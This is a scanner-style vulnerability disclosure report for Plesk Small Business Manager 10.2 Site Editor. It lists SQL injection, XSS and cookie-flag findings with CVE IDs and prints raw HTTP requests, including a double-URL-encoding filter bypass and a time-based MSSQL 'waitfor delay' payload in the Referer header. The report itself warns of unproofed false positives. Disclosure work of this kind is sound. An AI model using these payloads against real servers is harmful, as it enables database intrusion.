Plesk Small Business Manager 10.2 + Site Editor | Vulnerability Report of October 2010 on Windows 2008 R2 Server, 64 Bit

######################################################################## 
# Vendor: Plesk Small Business Manager 10.2 + Site Editor
# Product Description URL http://www.parallels.com/products/small-business-panel/
# Date: 2010-09-17
# Author : Hoyt LLC  http://cloudscan.me
# Contact : h02332@gmail.com
# Home : http://cloudscan.me
# Bug : Cross Site Scripting + SQL Injection 
# Tested on : Plesk Small Business Manager 10.2.0 // Windows 2008 /64/R2
# Disclosure : Uncoordinated 
# CVE ID's : CVE-2011-4763 -> 4768
########################################################################
Incoming links from Secunia 41765 and another incoming link from OSVDB 68624 and OSVDB 68623 and EDB 15313. NOTE - THIS REPORT MAY CONTAIN FALSE POSITIVES THAT HAVE NOT BEEN PROOFED Target = Plesk Small Business Manager 10.2.0 - Site Editor

Recon and Analysis of Plesk Small Business Manager 10.2.0 - Site Editor

SQL Injection, Cross Site Scripting - Identification and Confirmation

Report generated by Hoyt LLC Research at Tue Oct 12 16:27:23 CDT 2010.

1. SQL injection - CVE-2011-4763

1.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html [currentPageId parameter]

1.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery [filelist cookie]

1.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Image/Edit [PLESKSESSID cookie]

1.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish [Referer HTTP header]

1.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css [colorScheme parameter]

1.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif [template parameter]

1.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg [colorScheme parameter]

2. Cross-site scripting (reflected) - CVE-2011-4764

2.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image [file parameter]

2.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image [name of an arbitrarily supplied request parameter]

2.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php [name of an arbitrarily supplied request parameter]

3. Cookie without HttpOnly flag set - CVE-2011-4765

3.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/

3.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Login

3.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/NoCookies

3.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/UnsupportedBrowser

3.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/

3.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design

3.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit

3.8. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/

3.9. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html

3.10. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image

3.11. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery

3.12. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/

3.13. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add

3.14. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit

3.15. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Image/Edit

3.16. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/ImageUpload

3.17. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload

3.18. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Overview

3.19. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Pages

3.20. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish

3.21. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Start

3.22. http://vulnerarable.plesk.smb.10.2.0.site:2006/custom/

3.23. http://vulnerarable.plesk.smb.10.2.0.site:2006/external_login.php

3.24. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/bullet.gif

3.25. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/header.jpg

3.26. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/hleft.jpg

3.27. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/htop.jpg

3.28. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/spacer.gif

3.29. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_02.jpg

3.30. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_06.jpg

3.31. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_10.jpg

3.32. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_13.jpg

3.33. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_19.jpg

3.34. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_22.jpg

3.35. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_23.jpg

3.36. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/skins/default/images/toolbar.buttonarrow.gif

3.37. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/skins/default/images/toolbar.start.gif

4. Source code disclosure - CVE-2011-4766

5. Referer-dependent response

6. File upload functionality

6.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design

6.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add

6.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit

7. Email addresses disclosed - CVE-2011-4767

7.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image

7.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/Wizard/SiteFamilies.js

7.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/Wizard/Status.js

7.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/externals/scriptaculous/controls.js

7.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/externals/scriptaculous/dragdrop.js

7.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php

7.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/BlockModule.js

8. Robots.txt file

9. HTML does not specify charset - CVE-2011-4768

9.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image

9.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/blank.html

9.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php



1. SQL injection  next
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html [currentPageId parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Html

Issue detail

The currentPageId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currentPageId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the currentPageId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Wizard/Edit/Html?currentPageId=q485ez4jvyq%2527 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:34:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

GET /Wizard/Edit/Html?currentPageId=q485ez4jvyq%2527%2527 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:34:37 GMT
Connection: close


1.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery [filelist cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery

Issue detail

The filelist cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the filelist cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the filelist cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Wizard/Edit/Modules/ImageGallery HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9%2527; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 22:10:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

GET /Wizard/Edit/Modules/ImageGallery HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9%2527%2527; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 22:10:35 GMT
Connection: close


1.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Image/Edit [PLESKSESSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/Image/Edit

Issue detail

The PLESKSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PLESKSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73'; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:42:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73''; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:42:06 GMT
Connection: close


1.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Publish

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header. The application took 28439 milliseconds to respond to the request, compared with 10057 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Wizard/Publish HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=',0,0)waitfor%20delay'0%3a0%3a20'--
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:35:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

1.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css [colorScheme parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css

Issue detail

The colorScheme parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the colorScheme parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css?template=personal-018&colorScheme=green'&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:11:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
